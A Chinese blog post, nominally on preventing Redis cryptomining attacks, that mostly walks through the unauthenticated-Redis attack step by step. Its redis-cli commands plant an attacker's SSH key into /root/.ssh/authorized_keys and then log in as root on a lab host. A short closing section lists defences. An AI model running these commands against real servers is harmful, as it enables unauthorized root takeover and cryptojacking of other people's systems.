共計(jì) 2627 個(gè)字符，預(yù)計(jì)需要花費(fèi) 7 分鐘才能閱讀完成。

這篇“Redis 挖礦怎么預(yù)防”文章的知識(shí)點(diǎn)大部分人都不太理解，所以丸趣 TV 小編給大家總結(jié)了以下內(nèi)容，內(nèi)容詳細(xì)，步驟清晰，具有一定的借鑒價(jià)值，希望大家閱讀完這篇文章能有所收獲，下面我們一起來看看這篇“Redis 挖礦怎么預(yù)防”文章吧。

1、首先我們需要一些先決條件

條件一：你首先要有一個(gè) Redis，并且我們要知道他的端口【默認(rèn) 6379】；

條件二：Redis 的密碼不能過于復(fù)雜，或者沒有密碼；

條件三：?jiǎn)?dòng) Redis 的用戶最好是 Root 用戶，這樣破壞性更大；

2、開始搞事情

2.1 創(chuàng)建一對(duì)秘鑰

通過 ssh-keygen 生成一對(duì)，當(dāng)然可以使用已經(jīng)有的都沒有問題。

root@kali:/usr/local/src# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

接下來通過公鑰生成攻擊鍵值

(echo -e  \n\n  cat id_rsa.pub; echo -e  \n\n)   foo.txt

內(nèi)容如下

root@kali:/tmp/rediskey# cat foo.txt 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

這里前后增加兩個(gè)換行符是為了防止數(shù)據(jù)連接在一起造成失效問題。

2.2 配置 Key 到 Redis 中

操作如下：

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK

登錄 Redis 進(jìn)行檢查，是否已經(jīng)寫入進(jìn) Redis 中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379  get bar
 \n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n

2.3 通過 Redis 保存機(jī)制替換系統(tǒng)文件

且看如下操作

192.168.243.129:6379  config set dir /root/.ssh
192.168.243.129:6379  config get dir
1)  dir 
2)  /root/.ssh 
192.168.243.129:6379  config set dbfilename  authorized_keys 
192.168.243.129:6379  save
192.168.243.129:6379  exit

這個(gè)時(shí)候，我們登錄遠(yuǎn)程主機(jī)看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host  192.168.243.129 (192.168.243.129)  can t be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added  192.168.243.129  (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w

OK，到這里我們已經(jīng)提權(quán)成功了，那我們看下導(dǎo)出文件到底是什么呢？其實(shí)就是 Redis 的保存文件形式罷了，有興趣可以自己打開看看，這里不再展示。

3、如何預(yù)防

這個(gè)漏洞威力還是挺大的，我們現(xiàn)在只是拿到主機(jī)權(quán)限一個(gè)而已，加入放到定時(shí)任務(wù)執(zhí)行一些腳本然后在批量感染呢？

防范的技巧如下：

Redis 不要監(jiān)聽在危險(xiǎn) IP 上，如果有請(qǐng)加防火墻控制；

Redis 一定要增加密碼限制，且不能是弱口令；

Redis 盡量不要用 Root 用戶身份來啟動(dòng)。

做到如上三點(diǎn)防范 Redis 挖礦，沒問題的

以上就是關(guān)于“Redis 挖礦怎么預(yù)防”這篇文章的內(nèi)容，相信大家都有了一定的了解，希望丸趣 TV 小編分享的內(nèi)容對(duì)大家有幫助，若想了解更多相關(guān)的知識(shí)內(nèi)容，請(qǐng)關(guān)注丸趣 TV 行業(yè)資訊頻道。